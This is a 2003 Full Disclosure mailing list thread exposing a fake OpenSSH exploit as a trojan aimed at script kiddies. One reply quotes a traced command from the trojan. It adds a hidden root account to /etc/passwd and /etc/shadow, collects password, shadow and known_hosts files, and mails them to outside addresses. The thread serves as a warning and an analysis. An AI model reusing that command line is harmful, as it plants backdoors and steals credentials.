Full Disclosure mailing list archives

Re: Re: new openssh exploit in the wild! * is FAKE AS SH@!*

From: "V.O." <vosipov () tpg com au>
Date: Fri, 19 Sep 2003 20:27:18 +1000

Another good example of why closed-source exploits and "private" exploits
are bad (although it is an old story already). The rumours of their
existence can make people (or should I say, script kiddies) fall for
something like this one. Btw the most definite opinion on the exploit I have
heard several times is that there exists one for rooting openbsd, but "it is
unstable... we would not show it to anybody because it is so kludgy...etc."

W.


----- Original Message ----- 
From: "Raymond Dijkxhoorn" <raymond () prolocation net>
To: "Vitaly Osipov" <vosipov () tpg com au>
Cc: <full-disclosure () lists netsys com>
Sent: Friday, September 19, 2003 7:40 PM
Subject: Re: [Full-disclosure] Re: new openssh exploit in the wild! * is
FAKE AS SH@!*

Hi!

i looked at this piece of exploit... it is binary so i'am not sure

if

this is a trojan or a backdoor or a virus. but i can't see anything
strange while sniffing the exploit traffic. and i got root on

serveral

of my openbsd boxes with that. the bruteforcer seems to be very

good.

which is obviously not true. Btw as far as I understand, the troyan code

is triggered when

the "exploit" is run with the offset specified, and not in a

"bruteforcing" mode.


He most likely means, he rooted some of hhis own boxes where he tired to
run the 'exploit'.

Nice piece of social engineering.

printf("[*] sending shellcode\n")= 22
popen("(echo "sys3:x:0:103::/:/bin/sh" >> /etc/passwd; echo
"sys3:\\$1\\$nWXmkX74\\$Ws8fX/MFI3.j5HKahNqIQ0:12311:0:9999
9:7:::" >> /etc/shadow; /sbin/ifconfig -a >/tmp/.tmp;cat /etc/passwd
/etc/shadow /root/.ssh*/known_hosts >> /tmp/.tmp;
find /home -name known_hosts -exec cat {} >> /tmp/.tmp;cat /tmp/.tmp

/usr/sbin/sendmail -f ownage_at_gmx.de
m0nkeyhack_at_supermarkt.de) &> /dev/null ; rm -f /tmp/.tmp;", "r") =
0x0804a6b0


Bye,
Raymond.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

Re: new openssh exploit in the wild! * is FAKE AS SH@!* Vitaly Osipov (Sep 18)
- Re: Re: new openssh exploit in the wild! * is FAKE AS SH@!* Lars Olsson (Sep 19)
  - Re: Re: new openssh exploit in the wild! * is FAKE AS SH@!* christopher neitzert (Sep 19)
- Re: Re: new openssh exploit in the wild! * is FAKE AS SH@!* Raymond Dijkxhoorn (Sep 19)
  - Re: Re: new openssh exploit in the wild! * is FAKE AS SH@!* V.O. (Sep 19)
- Re: Re: new openssh exploit in the wild! * is FAKE AS SH@!* Adam Balogh (Sep 19)
  - Re: Re: new openssh exploit in the wild! * isFAKE AS SH@!* V.O. (Sep 19)
    - Re: Re: new openssh exploit in the wild! * isFAKE AS SH@!* Adam Balogh (Sep 19)
    - RE: Re: new openssh exploit in the wild! *isFAKE AS SH@!* Chris Eagle (Sep 19)